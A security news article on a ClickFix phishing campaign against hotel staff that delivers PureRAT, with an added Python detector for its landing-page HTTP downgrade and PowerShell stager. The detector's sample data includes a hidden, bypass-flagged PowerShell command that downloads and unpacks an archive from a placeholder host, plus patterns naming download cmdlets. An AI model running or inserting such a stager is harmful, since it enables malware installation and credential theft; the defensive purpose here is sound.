Cybersecurity researchers have identified a large-scale phishing campaign aimed at the hospitality sector and, specifically, at hotel management staff. The attackers send spear-phishing emails that impersonate Booking.com and redirect victims to malicious websites. The social engineering technique used, known as ClickFix, talks the target into copying and running a command themselves, so no software vulnerability is exploited; that command then deploys malware such as PureRAT. The campaign has been active since at least April 2025 and was still operational as of early October 2025.
The operation's primary goal is to steal credentials that grant access to major booking platforms such as Booking.com and Expedia. Once stolen, these high-value credentials are either sold on cybercrime forums or used directly by the threat actors to send fraudulent messages to hotel guests, leading to further financial fraud. This campaign is one of several similar attacks observed against the industry recently.
In the most recent wave, analyzed by a French cybersecurity firm, the malicious emails are sent from a compromised email account to numerous hotels across several countries. They lure recipients into clicking bogus links that start a redirection chain ending at a fake ClickFix page, which displays a supposed reCAPTCHA challenge to "ensure the security of your connection." That page in turn redirects the browser to a page hosting a JavaScript function.
On load, this JavaScript checks whether the page is being displayed inside an iframe. If it is not, the script redirects the browser to the same URL but forces plain HTTP instead of HTTPS. Only then is the victim shown the ClickFix instructions that manipulate them into executing a malicious PowerShell command. That command first gathers information about the system and then downloads a ZIP archive. The archive contains a binary that establishes persistence and loads the PureRAT malware (also known as zgRAT) through DLL side-loading, in which a legitimate executable is made to load an attacker-supplied DLL placed alongside it.
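As an added illustration, not code from the report or from the firm's analysis, the following Python flags the two observable stages of the chain described above: the landing-page script that checks for framing and then downgrades to HTTP, and the pasted PowerShell stager as it would appear in process-creation telemetry. The page snippets, log records, field names, hostname and scoring weights are all constructed for this example; the detection is heuristic and the weights are a starting point, not tuned values.

```python
"""Heuristic detection for the ClickFix chain described above.

Added example: not the report's own code. Samples, field names,
hostnames and scoring weights are constructed for illustration.
"""
import re
from dataclasses import dataclass, field

# --- Stage 1: landing-page JS that tests for framing, then drops to HTTP ---
FRAME_CHECK = re.compile(
    r"window\.(self|top)\s*[!=]==?\s*window\.(top|self)"
    r"|\bself\s*[!=]==?\s*top\b|window\.frameElement", re.I)
DOWNGRADE = re.compile(
    r"""location\.(href|replace|assign)[\s(=]*['"]?http://"""
    r"""|protocol\s*=\s*['"]http:['"]"""
    r"""|replace\(\s*['"]https:['"]\s*,\s*['"]http:['"]\s*\)""", re.I)


def page_downgrades_when_top(script: str) -> bool:
    """True when a script both checks whether it is framed and forces http:."""
    return bool(FRAME_CHECK.search(script) and DOWNGRADE.search(script))


# --- Stage 2: the pasted PowerShell stager in process-creation telemetry ---
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INDICATORS = {  # name: (pattern over CommandLine, weight)
    "hidden_or_bypass": (re.compile(
        r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-nop\b", re.I), 2),
    "download": (re.compile(
        r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b", re.I), 3),
    "archive": (re.compile(r"\.zip\b|expand-archive|extracttodirectory", re.I), 2),
    "recon": (re.compile(
        r"get-computerinfo|systeminfo|whoami|get-wmiobject|get-ciminstance", re.I), 1),
    "staging_dir": (re.compile(r"\b(appdata|temp|public|programdata)\\", re.I), 1),
}
# An interactive parent plus "-ep bypass" alone scores 4 and stays quiet;
# add a download cmdlet and the record trips the threshold.
THRESHOLD = 5


@dataclass
class Verdict:
    suspicious: bool
    score: int
    matched: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Parse a constructed 'Key=Value|Key=Value' record (Sysmon EID 1 field names)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))


def score_event(ev: dict) -> Verdict:
    """Score one process-creation record for the ClickFix PowerShell stager."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    if image not in ("powershell.exe", "pwsh.exe"):
        return Verdict(False, 0)
    score, matched = 0, []
    if parent in SHELL_PARENTS:  # Win+R (explorer.exe) or browser-spawned shells
        score += 2
        matched.append("interactive_parent:" + parent)
    for name, (rx, weight) in INDICATORS.items():
        if rx.search(cmd):
            score += weight
            matched.append(name)
    return Verdict(score >= THRESHOLD, score, matched)


def scan(lines):
    """Return (UtcTime, Verdict) for every record that crosses the threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        verdict = score_event(ev)
        if verdict.suspicious:
            hits.append((ev.get("UtcTime"), verdict))
    return hits


# Constructed samples (the hostname uses the reserved .invalid TLD).
SAMPLE_SCRIPT = """
if (window.self === window.top) {
  if (location.protocol === 'https:') {
    location.replace(location.href.replace('https:', 'http:'));
  }
}"""
BENIGN_SCRIPT = "if (window.top !== window.self) { top.location = self.location; }"

SAMPLE_LOG = [
    r'UtcTime=2025-10-02 09:14:03|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|ParentImage=C:\Windows\explorer.exe'
    r'|CommandLine=powershell -w hidden -ep bypass -c "$i=Get-ComputerInfo; '
    r'iwr http://example.invalid/a.zip -OutFile $env:TEMP\a.zip; '
    r'Expand-Archive $env:TEMP\a.zip $env:APPDATA\svc"',
    r'UtcTime=2025-10-02 09:20:11|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r'|ParentImage=C:\Windows\System32\cmd.exe'
    r'|CommandLine=powershell -ep bypass -File C:\Scripts\backup.ps1',
    r'UtcTime=2025-10-02 09:21:40|Image=C:\Windows\System32\notepad.exe'
    r'|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe',
]

if __name__ == "__main__":
    print("landing page downgrades to HTTP:", page_downgrades_when_top(SAMPLE_SCRIPT))
    for when, v in scan(SAMPLE_LOG):
        print(when, v.score, v.matched)
```

The page check is deliberately conjunctive: a frame-busting script alone (which also tests `window.top`) does not fire, only one that both tests for framing and rewrites the scheme. On the endpoint side, the record with an `explorer.exe` parent, a hidden window, a download cmdlet, a ZIP and a host-recon call scores 11, while an administrator's `-ep bypass -File` run from `cmd.exe` scores 4 and stays below the threshold.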
PureRAT is a highly modular malware with extensive capabilities: remote access, control of the victim's mouse and keyboard, webcam and microphone capture, keylogging, file transfer, proxying of network traffic, data exfiltration, and remote execution of commands or binaries. To hinder analysis, the malware is protected with .NET Reactor, a commercial .NET obfuscator. Once the attackers have access, they use the stolen reservation data to contact hotel guests via WhatsApp or email, instructing them to click a link for a supposed verification step to confirm their bank card details and prevent their booking from being cancelled, extending the fraud chain.